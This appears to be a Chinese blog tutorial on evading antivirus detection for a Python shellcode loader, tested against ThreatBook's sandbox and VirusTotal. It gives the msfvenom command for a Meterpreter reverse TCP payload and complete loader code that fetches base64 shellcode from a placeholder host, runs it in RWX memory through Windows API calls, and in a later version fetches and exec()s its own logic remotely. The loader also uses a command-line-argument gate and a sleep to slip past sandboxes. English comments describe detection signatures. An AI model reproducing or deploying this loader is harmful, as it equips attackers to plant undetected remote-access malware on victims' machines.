本文思路:
调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;
查杀情况,本文以微步云沙箱、VirusTotal测试为主:
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接一样很丝滑
def run1(shellcode):
    """Copy *shellcode* into a newly allocated RWX region and run it on a new thread.

    Args:
        shellcode: writable buffer of raw bytes (the callers pass a ``bytearray``;
            ``from_buffer`` below requires a writable object).

    Returns:
        None. The call blocks until the created thread finishes.

    NOTE(detection): VirtualAlloc(PAGE_EXECUTE_READWRITE) -> RtlMoveMemory ->
    CreateThread at the same address is the textbook in-memory loader chain.
    RWX private memory and thread starts outside any mapped image are exactly
    what memory scanners and API-hooking EDR sensors flag on.
    """
    # windows api
    PAGE_EXECUTE_READWRITE = 0x00000040 # region is executable, readable and writable
    MEM_COMMIT = 0x3000 # 0x1000 | 0x2000: MEM_COMMIT | MEM_RESERVE in a single call
    # PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # full process access (unused here)
    VirtualAlloc = windll.kernel32.VirtualAlloc
    RtlMoveMemory = windll.kernel32.RtlMoveMemory
    CreateThread = windll.kernel32.CreateThread
    WaitForSingleObject = windll.kernel32.WaitForSingleObject
    VirtualAlloc.restype = ctypes.c_void_p # declare the return type as a void pointer
    p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # allocate RWX memory
    buf = (c_char * len(shellcode)).from_buffer(shellcode) # ctypes view over the bytearray
    RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # copy the bytes into the new region
    h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # start a thread at p
    WaitForSingleObject(c_int(h), c_int(-1)) # -1 == INFINITE: block until the thread exits
以上是使用Windows API加载shellcode:先声明,再申请内存,给权限,创建线程
# Payload fetch: the base64 text is pulled over cleartext HTTP from a hard-coded
# (placeholder) host at run time, so nothing touches disk and nothing verifies
# who served the content or that it was unchanged in transit.
# NOTE(detection): an outbound GET for a .txt file from a script that then
# allocates RWX memory is the observable chain; proxy/DNS logs plus EDR
# memory telemetry are where this shows up.
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))  # bytearray: writable, as run1() requires
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
# Module-level payload fetch: runs at import time, before the argv gate below,
# over cleartext HTTP with no integrity or authenticity check on the response.
encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
shellcode=bytearray(base64.b64decode(encode_shellcode))  # bytearray: writable, as run1() requires
def run1(shellcode):
    """Copy *shellcode* into a newly allocated RWX region and run it on a new thread.

    Args:
        shellcode: writable buffer of raw bytes (the caller passes a ``bytearray``;
            ``from_buffer`` below requires a writable object).

    Returns:
        None. The call blocks until the created thread finishes.

    NOTE(detection): VirtualAlloc(PAGE_EXECUTE_READWRITE) -> RtlMoveMemory ->
    CreateThread at the same address is the textbook in-memory loader chain.
    RWX private memory and thread starts outside any mapped image are exactly
    what memory scanners and API-hooking EDR sensors flag on.
    """
    # windows api
    PAGE_EXECUTE_READWRITE = 0x00000040 # region is executable, readable and writable
    MEM_COMMIT = 0x3000 # 0x1000 | 0x2000: MEM_COMMIT | MEM_RESERVE in a single call
    # PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) # full process access (unused here)
    VirtualAlloc = windll.kernel32.VirtualAlloc
    RtlMoveMemory = windll.kernel32.RtlMoveMemory
    CreateThread = windll.kernel32.CreateThread
    WaitForSingleObject = windll.kernel32.WaitForSingleObject
    # OpenProcess = windll.kernel32.OpenProcess
    # VirtualAllocEx = windll.kernel32.VirtualAllocEx
    # WriteProcessMemory = windll.kernel32.WriteProcessMemory
    # CreateRemoteThread = windll.kernel32.CreateRemoteThread
    VirtualAlloc.restype = ctypes.c_void_p # declare the return type as a void pointer
    p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # allocate RWX memory
    buf = (c_char * len(shellcode)).from_buffer(shellcode) # ctypes view over the bytearray
    RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # copy the bytes into the new region
    h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # start a thread at p
    WaitForSingleObject(c_int(h), c_int(-1)) # -1 == INFINITE: block until the thread exits
if __name__ == "__main__":
    # Delay, then gate on argv[1]: as the surrounding text says, the loader only
    # runs when a command-line argument is supplied, so an automated sandbox that
    # detonates the file with no arguments never reaches run1().
    # NOTE(analysis): no behaviour in a bare detonation is not no capability —
    # re-run with an argument and account for the 10 s sleep when triaging.
    time.sleep(10)
    try:
        if sys.argv[1]:
            run1(shellcode)
    except IndexError:
        pass  # no argument given: exit silently
2. VirusTotal
本次使用msf生成的shellcode
具体命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.x.x.x lport=80xx --encrypt base64 -f c
连接和上次一样,秒连
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)
完整源代码》》》》
from ctypes import *
from ctypes.wintypes import *
import sys
import requests
import base64
import time
# Second stage: behind the same argv[1] gate, both the payload bytes and the
# loader code itself are fetched over cleartext HTTP and the latter is passed
# straight to exec(). The on-disk script therefore contains no Windows API
# calls at all; `shellcode` is presumably consumed by the exec'd text (not shown).
# NOTE(risk): exec() of unauthenticated remote content is arbitrary remote code
# execution — whoever controls or can tamper with that host controls this process.
# NOTE(detection): a Python process issuing two GETs to the same host and then
# allocating executable memory is the behavioural signature to hunt for.
try:
    if sys.argv[1]:
        encode_shellcode=requests.get("http://xxx.x.x.x:80xx/cccc.txt").text
        shellcode=bytearray(base64.b64decode(encode_shellcode))
        func = requests.get("http://xxx.x.x.x:80xx/uuuu.txt").text
        func = base64.b64decode(func)
        exec(func)  # flagged: executes remotely served, unverified code
except IndexError:
    pass  # no argument given: exit silently